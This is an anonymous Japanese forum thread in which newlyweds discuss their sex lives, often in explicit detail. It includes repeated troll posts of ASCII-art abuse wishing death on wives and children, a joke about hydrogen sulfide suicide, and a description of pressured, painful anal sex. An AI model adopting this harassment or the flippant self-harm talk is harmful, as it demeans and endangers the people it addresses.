定時退社して、7時頃『ただいま』で玄関で押し倒して一発。
湯上りに晩酌しながら嫁に酌させて一発。寝室に移動して一発。
朝マラで早朝に一発。が平日のパターン。
土日は殆ど終日ベットの中でやりまくり。ベットから出るのはメシの時だけ。 結婚2週間、初夜以来連続性交更新中。一日の回数は一回でも新妻は一回の性交で5回以上は逝く。
目指すは3週間〜1ヵ月。 ご両親に報告するまではどこか後ろめたかったが、婚約中のセックスがいちばん充実してたな。
連続性交18日目先程終了今夜は嫁の方から積極的に仕掛けてきた。
先にベットに入り眠っていたら股間に嫁の顔、俺のムスコをしゃぶっていた。
仕方なく嫁を裸にしてクンニして口と指で逝かせて、正常位〜屈曲位〜後背位〜横臥位〜正常位でフィニッシュ。 連続性交20日間達成!
嫁も俺も何故か頑張ってる。昨夜は一緒に風呂に入りお互いを洗いっこして気分を高めてベットに入った。
いつものように嫁の全身を手と口で愛撫してあげ、嫁は口と手でムスコを可愛がってくれた。
その後は挿入、正常位〜騎上位〜後背位〜正常位でフィニッシュ。今回は時間的に短くして終わらせた。 いつも夜風呂に入るヨメが俺に気づかれないよう朝シャワーを浴びていた。
おもわず服脱いで突入。
一応遊べるようにとローションも持って入ると最初「え?なに?」とビックリしながらも俺の手の中のローションを発見。
おっぱいをかるーく触り始めたら俺のモノをこすりはじめた。
久しぶりのSEXに喜びながらローションを手にたらし全身をマッサージ。
感じているのか腰をくねらせながら声を出しはじめたのでそのまま立ちバックで挿入。
朝からのSEXもいいもんだね。
連続性交22日目は変則で実行した。実は今日は出張のため夜は一人になる。
明日には帰るからいいが今夜はする事が出来ない。
ので今朝出勤前に合体した。起きてからシャワーを浴び着替える前に裸のまま嫁の前に立ちムスコをくわえてもらいながら嫁を裸にしてその後合体。
立ちバック〜座位〜正常位〜フィニッシュ。
今夜は一人でゆっくり出来る。 また自殺か・・
俺も硫化水素は仕事場で吸ったことあるがかなりキツイ臭いだった。
そして昔の記憶がよみがえった!
場所:
スカトロ→風呂場
硫化水素→風呂場
臭い:
スカトロ→嘔吐、呼吸困難
硫化水素→嘔吐、呼吸困難
結果:
スカトロ→人格が破壊され死亡
硫化水素→組織が破壊され死亡
ということは、スカトロもある意味自殺行為だということが立証された。
まだ1ヶ月にもならない新婚なのに
ハグやキスすら拒否される日がある。
腹が立つし、死にたくなる。
自分は42歳、妻32歳。縁あって2月に結婚しました。ふたりとも初婚です。
3日から連休になって5回やりました。
まだ今日と明日あるので、きょうは出かけないでセックスするつもりです。
妻は、またやるの?と言いますが、妻を抱きしめると勃起します。
挿入すれば、妻もけっこう乱れます。
8年付き合って今年3月に結婚
Hは週に3回あればいい方だな
彼女の方が仕事と趣味に忙しくて俺のために割く時間が少ないらしい
「8年も付き合ってるんだから今更そんなにHしなくても」
って言われて泣きそう
いろいろ新婚生活に夢見てたんだけどなぁ
いってらっしゃいのチューとかさ
一緒に風呂に入ってまったりしたりとか
8年付き合ってお互いのことを知ってるつもりだったけど
お互い別々に暮らしてたから
結婚して一緒に暮らし始めてようやくわかることが一杯ある
なんだか悲しい うちも旦那が一緒に風呂入りたがる
私は一人でゆっくり自分のペースで入りたい
湯気が苦しいから、入ってる間はドアや窓を開けておきたいんだけど、
旦那は寒いからと閉める
苦しいんだよ
この前疲れててマジギレしちゃった
ごめんね
でも風呂は別々にさせて >>188
信じられん!
ウチと同じような状況だが、違うのはウチの嫁はバツイチという点だけ。
若い頃は新婚といえば猿になるイメージを持っていたが、
自分の体は衰えているし、嫁の体は新鮮味というかうぶさのかけらもない。
嫁からしたら旦那を取り替えてみたが
トシ食った男を選んだから仕方ないと思ってると思う。
エッチ目的で結婚したけでないから俺は構わんが、
嫁は子供を産みたいみたい。
キム兄の心境だ。 ↑結局あんまりやってないということ?ヨメはんバツイチであんたが初婚ってことなの? >>192
そうです。夫婦仲は悪くはないとは思うんだが、どうも燃えない。
いま嫁が帰ってきたんで、おいとまします。 最近は相手が絡んでくるまでやらないようにしてる。
女って不思議だな、かえってくるくる。
一回り以上違うからまだまだやりたい盛りなんだな。
そうおもうとかわいいよ。 今日で1週間目なんですが質問があります
コンドームは男と女どちらが買うもんなんですか?
自分は以前付き合ってた彼女に、男が買うもんじゃないって
言われたんですが今の嫁さんはいわゆるカタブツなもんで
恥ずかしくて買えないと言ってます・・
まぁどっちでもいいとは思うのですが世間ではどんなものなのかなぁと
週1くらい。
新婚1ヶ月でこれって??
女だって浮気心も起きるってもんだ。 >>190さん
旦那さんのこと好きですか?
風呂拒否されると
愛されていないのかと鬱になる。
話し合いの結果、一生別風呂になった。
ハッハッハ。
>>195
夫婦で買いに逝けば良い。
二人で買いに行けば単に仲が良い夫婦としか思われないぞw >>198
大好きですよ。愛してます。
風呂一緒に入りたいなら、大きいお風呂で、
窓やドアを開けておいて欲しい。
呼吸が苦しいの。相手にそんな思いさせたいの?
首締めないと理解できない?
時々家族風呂に行きます。一緒に入るために。
お風呂広いし露天だったりするから、とってもいいよ。
Hは週に3回なら、むしろ多いくらいなんじゃないの?
疲れてるから週に1回とか、普通だと思う。
うちも週に3〜4回くらいだけど、今だけだと思って付き合ってる。
いってらっしゃいのチューはタイミングが合えばするよ。
旦那が帰ってきたら、自分で鍵を開けさせずに、インターホン押して貰って
迎えに出るのをしたいな〜と思ってたけど、
実際は帰宅時間が同じくらいだから私も疲れてるし、無理。
こういう風に思ってるのを旦那は知らないだろうけど。
旦那も最初は色々想像と違うって悲しんでたけど、
基本的にポジティブシンキングな人なので(そこが一番好き)、
二人で折り合いをつけているつもりです。
あ〜でも、旦那に肩揉んで貰ったり、何もかもしてもらいっぱなし・・・。反省。 新婚何ヶ月で初オナニーした?
俺は2ヶ月経過で
まだ必死に我慢してる。
嫁への忠誠を示すために。
でも、嫁から「ひとりでしていいよ」って言われるw
オワタ\(^O^)/
新婚だけど月3回くらいしかHしない。
フロは一緒に入ったことないです。
今度引越ししたら寝室別にしてほしいといわれた。。
そろそろ別居か? >>202別居ならまだいいがいきなり離婚してと養育費慰謝料請求されてご愁傷様 俺なんてキスも週1回。
手なんて結婚してから握ったことないし。
フロももちろん別。 はぁ〜聞いてください。
6年付き合ってからの結婚3ヶ月目です。
嫁さん看護師の為、夜勤やら変則的な勤務で
相当疲れているみたいです。
多分、一人暮らしが長かった理由もあり
俺の分のご飯を作んなきゃいけない、洗濯しなければいけない、など
多分相当疲れているのではないかと思います。
SEXに関しては、3ヶ月で約5回ですorz
しかも最近2ヶ月は月1回です。
只今、2回連続誘って断られています。(理由は疲れているからと)
もうさすがに誘えないですよ・・・・・・。
どうすればいいでしょうか?
一応私が先に帰ったときには洗濯、ご飯炊いたりなどの
出来る限りのことはしております。 六年つきあって、、ってその間はどうでした?六年っていったら、長いよね。
実質的に六年目の倦怠期ってことじゃ? >>206結婚してんだし嫁さんに専業主婦になって貰うか昼勤務だけにして貰うと言うのは無理なのか?そりゃーナースだと勤務もきついし疲れてるからセクロスも出来ないわなー 新婚時代はとにかくヤリまくったよ。
寝起きに一回、朝食後出かける前に一回、昼食を食べに帰って一回、
夕方帰宅してそのまま一回、寝る前に1〜2回。
休日は服を着る暇もなく、1日中ベッドの中でつながりっぱなし。
この生活が2ヶ月続いたよ。
結婚して10年経ったから体力も落ちたけど、出来るものなら
今でも嫁とこんなにヤリたい。
そんなにしたら、よめさんのマンコが赤ムケになるって、、、、、、
因幡の白ウサギだよ。
嫁は大丈夫だったが、俺の方が赤くなって痛かった。あれだけヤリたかったのは、気持ち良すぎたのと、結婚前にかなりお預けくってた反動だな。
新婚半年です。結婚前は、声も出すしけっこう乱れていたが、結婚してからまぐろ状態。
感じなくなったのか、結婚前は演技だったのか・・・ >>212
そんな時間に2ちゃんですか?
ボケですね 童貞男だったオレは当然オナニーしか知らなかったが、妻のオマンコの中で射精する気持ちよさに
猿状態になったね。
しょせん、自慰は出した後空しいもんだったから、感激した。 付き合って7年新婚1ヶ月半で3回しかしてない
私は求められたら嬉しいのに旦那は何もしないで毎日すぐ寝ちゃう
もう飽きられちゃったのかなぁ…
自分から誘うのは疎まれたりふしだらとか思われるの怖くて言えない
セックスが夫婦の全てじゃないだろうけどそんなことも伝えられないのが悲しい
ここの男性の書き込み見るとお嫁さんがうらやましくなります >>218
おいバカ
お前は毎日ネカマレスを書いてて悲しくならないか?
情けなくないか
友達いないからしょうがないか… ↑
暴走と妄想が止まらないお馬鹿さんww
ttp://babiru.bbspink.com/test/read.cgi/couple/1148646846/
>>142
ttp://babiru.bbspink.com/test/read.cgi/couple/1210922826/
>>618 >>220
嫁も女も友達も居ないお前の2chでの行動パターン
寂しさを紛らわす為に自演やネカマをしながらレスが返るのを待ちわびてる
しかし少しでもお前に反対するレスが付くと自演しながら多人数を装い全力で猛反撃
レスが返らず暇を持て余すと荒らしに変貌して他板で荒らし活動 ↑
だ〜か〜ら〜〜〜
わざわざ自己紹しないでも
ttp://babiru.bbspink.com/test/read.cgi/couple/1148646846/
>>142
ttp://babiru.bbspink.com/test/read.cgi/couple/1210922826/
>>618
これ読めば誰でも分かるっちうのww
それよりオマエのコピペ攻撃つまらんわ。
もっと脳ミソ活用して俺を楽しましてくれよww >>222
そんな有名なコピペにマジレスするなよ (笑
それとも図星だったのか >>224
素直になれよ
ネカマや自演を邪魔されるのが悔しいって (笑
みんなに質問したいのだが、初心者のオレに教えて欲しい。
セックスドラッグを使ったオナニーとかセクスとか具体的にどんな快感なんだ?
体がとろけてしまいそうな快感で、チンポがしぼんでしまうと聞くが、、、、
その時、女はイキまくって、濡れまくって、失神してしまうと聞くが、、、、。
一体その時何が起こっているんだ!? 頼む、詳しく教えてくれ、頼む。
もうひとつ教えて欲しいんだけど、みんなが言ってるファミマって
ファミリーマートUSAのことなのか? ここだと日本まで送ってくれるのか? オナニー禁止って言われたら、うれしいと思うほうが幸せなのかな 子供が早く欲しい新妻31歳のリクエストに応えるべく41歳がんばってます(☆☆) >>227
そりゃあ「オナニーするくらいなら私とSEXしよう!」って言ってるんだろう?喜べ!
>>228
がんばれよ!俺も頑張ったwww
妻と結婚前は一度もHしなかったのですが、新婚旅行以来、生理の時以外は毎日
です。休みの日は3回した時もあります。妻も嫌いではないらしく、ものすごく
気持ちイイと言っています。まだ2か月ですが、こんな生活を続けていたら、早晩
飽きてくるのではと心配です。 >>230
婚前0回は珍しいが、新婚で生理以外毎日は普通じゃね?
自分7年も付き合って結婚したけど、
新婚てシチュだけで興奮したのか1年間は殆ど毎日やってたなー。
長男妊娠中はフェラと手コキに変わってしまったが。
夫婦にとっての試金石は妊娠出産じゃなかろうか。
その後育児が一段落するまで、いかに夫が妻をいたわり、妻が夫につくせるかで
関係が違うだろうと思う。
レスに陥る夫婦もあるし、新婚時代は目じゃないようなエロを展開する夫婦も。 36歳で結婚し嫁はまだ23歳、SEXを満喫するところまでは行ってないようで
毎回、少し痛みがあるそうだ。俺は毎日がうはうは、会社でも午後になるとうずうず
してきて勃起したジュニアをなだめるのが大変。嫁はそろそろ月のものが来るころな
ので、その間どうやって過ごすか悩みだ。 俺なんて、ちょうど結婚1年目だが既に10日に1回くらい。
結婚直後から週1くらいだったし。
俺が超フェラ党なんだけど、フェラだけでイカしてくれず、一度挿入したチンは舐めてくれないし、
精子なんて今まで一度も飲んでくれない。
俺は嫁の好きなように満足するまで舐めあげたり、指でやってあげてんのに。
嫁には毎晩ねだられるが、もう俺は嫁としたいって気が起きないんだよね。
結婚後にしたSEXの回数よりオナニーのほうが数十倍多いし。
このスレやら似たスレ見てて、そんな嫁が羨ましい。
顔とスタイル、性格は好きなんだがものすごく後悔してる。 フェラ大好き夫とフェラ嫌い女が結婚したら、夫は淋しいんだろうな
そういうネガティブなスレをロムってるだけで心が痛い、結構フェラ好きな自分(♀) 私はすっごく舐めたいしゃぶりたいときがたまにある。
数ヶ月に一回くらい。
旦那は感激してくれる。
ほぼ毎回クンニしてくれるのにな。
悪いなぁ。
でもフェラ好きじゃない。大きすぎてつらい。 >>234
なんで好きなの?
今まで付き合った彼女は「俺が気持ち良くしてる姿をみるのが嬉しいし、頑張れる」って言ってくれてたが、嫁はそんなのお構いなしに「私は風俗嬢じゃないから、私ばかり一方的にできない」だとさ。
結婚一年だけど、既にしたくもなかった浮気三人だよ… でないと満足できないし。まだ俺29歳だし。 うちの嫁、潔癖というか、前儀でクンニは拒否していた。1年経ったこの頃、
嫁のほうからフェラするようになり、変化に驚いている。やはり何事も時間が
解決するということがよく分かった。 結婚半年ですが、旦那が1週間出張で留守、昨夜メールが入り、悶々として
眠れないので、写メールで送ってくれときました。明るくして写したものを
送ると、よかったという返信がきました。 >>236
何で別れねーの?
性欲を理由にして浮気したいだけじゃねーか。 私44妻47ですが半年前に結婚しました。ネタと思われるかもしれませんが、私は初婚で妻は子あり(既に独立してましたが)バツイチでした。目下週3日ペースで励んでいますが、毎日仕事から帰宅するのが楽しみでたまりません。 >>240
ごちそうさま(笑)
エチするしないに関わらず、いつまでもそう思えることが円満の秘訣。 何歳でも新婚なら
元気有るのが普通
毎日したよ
入れたチンポも舐めてくれるし いった後も口で綺麗にしてくれる
愛を感じるよ このスレ、ノートンのチェックがかかってPCから開けないんだが… >>243
「おまえはこのスレに来るな」とノートン先生が言っているwww 新婚1ヶ月なのに週1しかしてくれない旦那様…
私は毎日でもしたいのにorz >>243
蕾を使っていると、ログがかかるんでは? 主人と半年の付き合いで結婚した新婚ですが、会社で毎日忙しく、疲れるらしく
あまりHしようと言いません。3か月になりますが、新婚旅行から帰ってまだ5回
ほどです。私から誘ってみようかと思っているのですが、皆さんのうちでは、どんな
もんですか? >>248
それは少なすぎ
つうか半年の付き合いってお見合い結婚? 新婚のうちは毎朝毎晩、手を掴まれ旦那の布団に引っ張り込まれてたなぁ。
7年も付き合ってて、既にかなーりやりまくっていたのだが、
旦那は「新婚」というシチュに暫く夢見心地だった様子。
どちらかというと現実的な私の方は、食傷気味だった。
でも新婚て毎日するもんだと自分に言い聞かせ、頑張ったつもり。
子供の目も無いし勃起し放題だったし。
反対にいえば妻からだって挑発し放題だよね。別にどちが誘ってもいいような気はする。
単にうちが旦那からばかりだっただけで。 >>218
同じだー
うちも結婚して、半年もたってないのにレス気味
誘うのはいつも私から
前戯も超簡単、私がチンさっても、見たいテレビとかだと振り払われる時がある
結婚して自分のものになって、いつでもヤレル嫁
と思われてんだろうな
付き合ってた頃と態度が違う不良品
>>218>>251
俺、男だけど新婚一年ではるかにオナニーのほうが多いよ。月にエッチ1〜2回、オナニー20回くらい。
嫁とのエッチに、肉体的な気持ち良さはあるけど、精神的に満たされないから、だったら手軽に自分でやろうってなった。
毎日嫁から誘われて何度もケンカになったけど、嫁の態度っていうか相性っていうのか…案外男もナイーブなんだよね。ちょっとした嫁の仕草や言葉で嫌になったりさ。 うちは新婚旅行2週間行ったけどその間、2回しかやってない。
あとは、週1回ペースで月3回がノルマ。
今年で結婚二年目だけど、まだ今年やってない。小梨だから新婚? >>252
あーそれうちもあるある
生意気な口きかれたりとかだらしないとこ見ると萎える
けど自分の事棚に上げてたりするw >>254
最後の一文は男の性だ(笑)
女性、特に妻には仕草や言葉遣いは丁寧であってほしい… 来月結婚予定ですが、先日初めてラブホに入りHしようとしたら勃起しないのです。
彼女が「今日は緊張しているのかしら」といって慰めてくれましたが、心配です。
ひとりでオナニーするときは固くなり射精するのですが、こんな経験ありませんか? >>256
童貞なら普通
非童貞でも、初めての相手のときには緊張して勃たなくなることはある
気にしすぎるとよくないので、あまり気にしないことだな 新婚三ヶ月。旦那がエロ画像見るのが嫌だ。旦那のPCの中には二次元アナル物ばかり・・
ただ収集してるだけ、何もしてないと言われていたけどこの前アナル二次元物でオナってたのを目撃。
ショックだったけど自分なりにそういう欲求が溜まらない様に口でやったり、とうとうアナルもやった。
中田氏されたら下痢になりそうだから最初にいやだって言っておいたのに、
いざ初開通したら何回も何回も中田氏していい?とひたすら聞かれてしかたなく中田氏。
下痢になるは腸?みたいな膨らんだのがお尻からちょっと出たし痛いしで辛かったけど喜んで貰えたし
解消されたかなと思って安心してたら開通したその日の夜にエロ画像収集・・
これ以上はもう何も出来ない・・・・しんどい >>258
結婚3ヶ月目なんて、うちは毎日やりまくってたぞ。ご愁傷様。
結婚前に旦那の性癖に気付かなかったのか? バカ夫婦wwwwwww
バカ夫婦wwwwwww
バカ夫婦wwwwwww
見てるんだろ結婚猿!!!
バカ夫婦wwwwwww
バカ夫婦wwwwwww
バカ夫婦wwwwwww
見てるんだろ結婚猿!!!
まだまだイジメてやる^^ 昨日恥ずかしかった。抜かれた時、膣から?空気が鳴る。オナラのようで萎えますよね。特にバックで抜いた時に鳴ります。
あぁ…自分で書いてて笑えてしまう。結婚一年で週3、4ペースでしてますがレスは嫌だなぁ。鳴らない方法あったら教えて下さい 交際期間中に月何回か数えたら15回はしていた。
結婚した今はもっと多いかも。
飽きることも無いし
お互いに相性がばっちりなだけに猿状態。 なんや 新婚さんか? 新婚さんはええな 一生に一度やからな 存分に楽しむべきやね 結婚猿ひたすら我慢して悔しさレスw
一生忘れられないようにイジメてやる^^
目に焼き付けろ結婚猿 精神を破壊してやる
結婚猿は非人間
ブヒィィィィ ! (^ー^*)
(⊃ ⌒つ
∵,;゙(;゚)0.(´;;;☆と三______ )
ドカッ (ω (
`ヽ_)
\\
ゴミ嫁ゴミガキ死んじゃえ 結婚して三週間。保々毎日セックスしてるんだけど
仕事中怠い 毎日睡眠不足だし結構辛い。
嫁さん、今19歳なんだけど童顔のせいか色気無し
今だにバックプリントのパンツとかはいてるし
色気のある嫁さんが羨ましい。起たせるのに苦労してます。 毎日どころか一日数回してる
もちろん出ないもんは出ないが硬さだけはイケル
いい加減ヒリヒリしてるが、ノーブラノーパンで前を歩かれると本能が中に入りたがる
処女だったし先月までは痛いって言ってたのに、今は生理中でも平気になったようだ
揺れる胸が俺の股間を誘うぜ〜 うちの場合、新婚10年目でセックスは大体つきに10回程度。メンス以外の日はほぼ隔日です。 新婚2年目、最初は生理の時以外毎日、寝る前の習慣になっていたが、さすがに
この頃毎日はきついのだが、嫁は毎日したがるので、2回に1回は入れるだけで
出さないで、手で嫁を逝かせてやる。 入り婿だから、嫁と義母にははかなり気を使う
嫁と義母は一卵性親子みたいに仲が良く、
前の晩の出来事まで逐一知ってる義母には唖然とする 年末結婚予定で、来月から一緒に暮らすのですが、世の夫婦の皆様は
エッチのとき布団ってどうしてるんだろ??
今まではお互い一人暮らしだったので月1回程度ホテルに行ってた
んだけど、自分ちでするようになったら布団が濡れちゃうから、厚手の
タオルケットとか敷いてやるのかな、とか気になってしまう。。。 50代の夫婦です
結婚当時からダブルで仲良く寝ています
枕の下にバスタオルを何時も入れてあり、朝なり夜でも
致すときは、使用しています
最近は、妻のお尻の下に枕を入れ、その上にバスタオルをかぶせて
楽しんでいます
>>275
新婚さんですか???
うちは避妊中だからゴムつけるしとくになにか敷いたりしない
汚れたら洗う 275です
夫婦になって25周年、子供3人育てました。
IUDが入ってるので、排卵日でも中出しです。 新婚当時は職場と住まいが近かったので、昼休みもかえって一発、
夜は二発毎日していた。
俺も結婚25年、今は週2が限度。でもたまに連続二発する。さすがに
若い頃のように2回目の出は少ないけどな。セックスは円満夫婦の原点。 >>277
新婚さんは…ってスレタイだから新婚さんの話かと思いました
25年経っても子供がいてもそんなにセックス三昧なんて羨ましいですね
うちなんて新婚だけど多くて週1ですw
仕事で疲れて帰ってセックスどころじゃないなぁ >>279
新婚では無くてすみません
読んでいて、面白く気が付いていたら書き込んでいました
新婚の頃が懐かしい
仕事は辛いものですよね。
私事ですが、疲れを残さないように、食事は気をつけてます
残業なら、ちょっと抜け出してカロリーメート等を販売機のコーヒーで
家に帰ったら、軽く食べて、朝はしっかり食べます
あと、朝鮮人参の焼酎(長野県しか手に入らない)を毎日飲んでいます
お互いリーマンなら疲れは残さないように注意しましょう
追伸
内のsexは、朝起きがけにやるのが多いです
少し書いてみます。結婚2年目で主人42才わたし31才。
ウチは、自営なので出先から帰ってくると襲われます。 >>281
どの様に知り合ったのか
その辺から聞きたいですね
もうすぐ結婚1年。
その前は遠恋長くて付かず離れずみたいな付き合い。
結婚後普段の生活は特に不満も無かったけどセックスレス。
というか、日々のスキンシップも皆無。寂しい。
別に性欲満たしたいとかやりたい!てわけじゃないけど愛情を感じない。
二人とも若くないので(旦那40前、私30代前半)、子供も欲しい。
旦那も子供イランというわけじゃないようだけど、日々好きなように
ゲームやって漫画読んで寝てる。
ちなみに結婚後1年でやった回数3〜4回。
この前余りに愛情を感じなくて泣いていたらすごい暴言吐かれて
ウゼーあっちで寝ろといわれて私はリビングの床で寝た。
居たたまれなくなって翌日から実家に逃亡(でも近い)←いまここ
以後なんも連絡してない。
これからどうしていいかわからないorz バカ夫婦wwwwwwwバカ夫婦wwwwwww
バカ夫婦wwwwwwwバカ夫婦wwwwwww
バカ夫婦wwwwwwwバカ夫婦wwwwwww
見てるんだろ結婚猿!!!見てるんだろ結婚猿!!!
結婚猿は非人間 結婚猿は非人間 見てるんだろ結婚猿!!!
ブヒィィィィ ! (^ー^*) ブヒィィィィ ! (^ー^*) まだまだイジメてやる^^
(⊃ ⌒つ (⊃ ⌒つ
∵,;゙(;゚)0.(´;;;☆と三______ ) ∵,;゙(;゚)0.(´;;;☆と三______ ) バカ夫婦wwwwwww
ドカッ (ω ( ドカッ (ω (
`ヽ_) `ヽ_) まだまだイジメてやる^^
\\ \\
バカゴミガキ嫁しんじゃえ バカゴミガキ嫁しんじゃえ 見てるんだろ結婚猿!!!
バカ夫婦wwwwwww バカ夫婦wwwwwww
見てるんだろ結婚猿!!! 見てるんだろ結婚猿!!!
まだまだイジメてやる^^ まだまだイジメてやる^^
一年前は、バックは「おしりの穴、見られるからイヤ」と言っていたのに。
今では、妻の方からバックに誘う。
今日は朝から、いっぱい突いてあげよう。 >>287です
妻が二度イッテから、最後はお口に出してあげました。
ふたりでシャワーを浴びて、妻は昼飯の支度にかかったところです。
キッチンに立つ、妻の腰つきを見ていると後ろから襲いたくなります。 知り合って5年の新婚7ヶ月です
水曜と金曜は 嫁(20)がコスプレでお迎え
俺51だけど
週3でがんばっています
がんばってます
2年以上付き合って結婚したのですが、結婚前コンスタントに週1でやってたのに、
今は月に1〜2がやっと。男ってこんなに早くSEXが飽きるものでしょうか? 旦那の両親と同居してることもあり、結婚してから3ヶ月たったけど一度もしてない(';ω;`)
仕事で疲れてるだろうから自分から誘っていいのかわからないし、いい感じの雰囲気になると義父が部屋にノックもなしに部屋に入ってくる… この春に結婚したホヤホヤの新婚です
性交は週四回位です
私は毎日でもいたしたいのですがね 最初から回数が多いと早く飽きがくるので、長く続けたいのら、セーブしたほうが
良いと思うよ、週4回でも多いぐらい。むしろ1回の密度を濃くするように心がけなさい。 >>295
ははぁっ<(_ _)>
勉強になります >>291
奥さんに飽きたんじゃない?マグロじゃだめだよ。。 俺童貞、嫁非処女で結婚4ヶ月。
他の男とこういうことをしたんだと思うと全てが空しくて、嫁ではイケなくなってしまった。
不倫や離婚など考えたくはないけど、吹っ切れる方法を知りたい。 >>298
ナイーブだなあ…
自分にもそういう時期があったけど、
ありのままの相手と向き合う事が必要だよ。
結婚しようとしてた彼女が、
風落ちしてた自分よりいいじゃないかw
もちろん、全て破談したよ。
>>298
家も俺26歳童貞、嫁26歳処女(自称だけどね)で結婚一年半。
嫁は見た目、エッチに興味が無さそうなタイプ。
初エッチも付き合って半年くらいしてから。
でも初エッチしてからは、嫁の方から求めてくる事もある。
金曜の夜は、俺が帰ったら、裸エプロン姿で台所で食事の
支度してくれた。もちろんお尻は丸見え。昨夜は燃えました・ 俺22、嫁36
毎晩中出しでやりまくりです
気持ちいい〜〜〜〜 3月に結婚したばかりです
今日旦那に「セックスに興味がない」と言われてしまった…
私は旦那が初めての相手だからフェラとか頑張ってたつもりだったのに
もう私に魅力がなくなっちゃったのかな
ちなみに私21歳、旦那27歳です
>>303
嫁さんの方がエッチが興味がなくて、エッチレスはわかるが
旦那の方がエッチに興味がないなんてあるのですね。
家は、嫁はちんぽ大好き、俺は嫁のお尻大好き(お尻フェチ)
だからね。でも夫婦ってエッチがすべてでは無いですよね。 >>304
私は旦那とのエッチは大好きなんですけど、結婚してから前戯含めて5分で終わるんですよね…
回数も2週間に一度あるかないかだし、私ばかり誘ってます
キスも全然しなくなっちゃったし、なんだかちょっと寂しくなってきますね('・ω・`)
>>305
嫁の方か誘って旦那が断るなんて、世の中の既婚男性で羨ましい
と思う人どの位いるだろう。家は結婚一年半、お互いエッチの
経験が無く結婚したので、テクはありませんが、嫁も結構が好き
になってきたみたいで、俺の朝立ち処理は良くしてくれてあり
がたい。あまり経験豊じゃありませんが、エッチに工夫して
見たらどうですか?たとえば2人きりの生活なら、裸エプロン
とかで、誘ってみたりとか。面白いかも
>>306
素敵な奥さんですね!
私も見習って頑張らないとだ><
裸エプロン…恥ずかしいけどやってみます!
なんだか経験不足で旦那に申し訳なくなってきますね…
>>307
旦那とのエッチがんばって下さい。
家の嫁は今友達とコンサート行って留守にしてます。
あと俺が思いついたやつは、旦那さんが帰ってきた時
ノーブラにTシャツ(できれば透けてるやつ)とか
刺激与えるような姿でお出迎えとか、お出迎えの
時に、こちらから、旦那のちんぽズボンの上から
触りながら、抱き合って強引にキスしてあげたり
とか嫁にいきなりしてもらって、仕事の疲れとか
忘れた事ありますよ。がんばってね
私は週4回位ですですが
1回1回が早いので
(せめて、カップラーメンできるまでと言われています)
妻は不満だらけのようです。
1回1回が長続きする方法を検討中。
回数でなく中身だそうです。 >>309
回数もだけど、内容もかもね。じゃないと奥さんに飽きられて
レスになる可能性も。特に出産後レスになりやすいのでご注意。 >>302
何かとスキがあるタイプでね。
店の名刺が落ちてたり(もちろんダミー会社)
薬の包みが落ちてて、調べてみたら
クラミジア治療薬だったり。
でも、店のホームページで紹介されてた彼女を見た時、
何だか身体中の力が抜けたわ。
そもそも、付き合いはじめから
二股だったり、援の過去があったり、
最悪だったんだけどね。
それでも「気持ちを入れ替える」って聞いてたから…
でももう、過去の話だよ。 >>311
そんな女を信じてあげた311氏は優しいから
これからきっと素敵な女性に巡り会えるよ! もっと性欲の強い男と結婚すれば良かった。
新婚なのに寂しい夜ばっかりだよ。 >>312
ありがとう。ちなみに、次に付き合った子と結婚したよ。
いまは夫婦円満。 一応、結婚したけれど、お互いの職場の関係で一人暮らしのまま。
2年間で数回しか会ってないし、会っても食事と買い物程度。
もしくはお互いの実家に挨拶に行く位。
結婚した意味あるのかと思ってしまう。 まだ新婚で一緒に寝ているにもかかわらず
勃起しない
エッチする気無い
拒否る事がある
そんな状態の男ではすでに終わっとるんではないだろうか
新婚時代以上にエッチの頻度はそうそう上がらないもんだよ
切実な欲求不満を感じるなら、早いうちに見切ったほうがよいと思う
>>314
おめでとうさん!
やっぱり良い人は素敵な嫁さんもらえるんだな!
これからもお幸せに♪ 家事完璧、料理上手な嫁だが、童貞だった俺には嫁の過去(2人と経験あり)が嫌で嫌で仕方ない。
この心のわだかまりを解消できずにいる結婚4ヶ月。 >>319
なんでそんな考えもつんだ
現在がよければ未来も良いと考えないんだ
おかしいと思う。 >>319
嫌なら早めに離婚すれば良い事だよね。
できれば子供ができる前に。そんなわだかまり持って
たら一緒にいても楽しく無い。 俺は28歳で、童貞で結婚して2年目。嫁は経験ありだけど、エッチは
週3で、ほとんど嫁がリードしてくれる。特に嫁が俺のアナル舐めて
くれるのが気持ち良い。同じベットで寝てるので、週末は俺の朝立ち
口で処理してくれる。今が一番幸せな時期なんだろうか。嫁と知り合う
前じゃ考えられないような生活。 12日に結婚式挙げたけど、同棲7年だったからもうセックスレスだよ。新婚初夜なんて、ちゃんちゃらおかしい
週1の手コキで済まされてる 5月半ばに結婚して6月頭から同居したけど、回数は3日に1度くらい・・・
結婚前2年半くらい遠距離だった割には少ないよね・・・
結婚式前も準備でばたばたしてるから「エッチは結婚してからね」なんて結婚1ヶ月前に言われたりしてた・・・
1日16時間労働の激務とはいえ、正直、物足りないし、寂しい・・・
社宅の他の新婚さんは毎日やり倒してるのかと思うと・・・女として終わった気がして悲しい
ミスコン出れた顔と身体でも、私相手じゃあその気にならないかと思うと凹む
私より不細工だったり、貧弱な人でもうちよりはしてると思うと悔しくて毎晩泣いてます・・・ それだけ激務の旦那さんなら、3日に一回でも大変!
まずは労ってあげて下さい。 >>322
そういう考えを持ってるなら、別れてあげた方がお互いのため。
ただし理由を知ったら奥さんは多分男性不信になるかもな。
相手の心に大きな傷を残す事はお忘れなく。
それでもいいなら役所へどうぞ。
>>324
俺も似たようなもん。
結局新婚かどうかより、どれくらい一緒に住んでるかで変わるよな。
手コキしてくれるだけまだマシじゃないか。 お付き合いしてる時の方が、良かったって人多いよね。
手つないでラブラブしてるカップルいるけど、
結婚して子供できたらレス。おおいらしいいよ。
結婚は良く相性考えてしないと駄目だよね。 >>328
手コキでもいい方なのかな?
つくづく思ったけど、7年も同棲した事に後悔してるよ。
うちは新潟県小千谷市の田舎だから親が親戚の目もあるから決まりを付けろと言われて長岡市で式を挙げたけど、全然新鮮味ないから笑えた(笑)
初夜だって「式で疲れたから手で出してやる、嫌なら自分でしな!」だぜ >>330
>>328です。
お、偶然!うちも新潟だよ。
俺は1年同棲の後結婚して現在結婚2年目。
まだレスでは無いが、明らかに回数が減っている…
同棲前は会う度にやってたのに、同棲し始めたらすでに減ってきてたな…
うちは嫁が淡白で、今は7割方拒否られる。何か手をうたないと…
新婚初夜はうちも同じ理由で何も無かった。手コキしてくれるだけでもいいよ。
セックスレスとのことだけど、子作りはどうするの? >>331
おっ!同郷!乙!
あんたが子供だから要らね!の一言…
まぁ同棲7年、段腹じゃチンポ萎える >>329
まさにそう。
もっと言えば、結婚する前はかなり遊んでいて、
結婚を決めるにあたり、二度と悪い事をしないよう心に誓った。
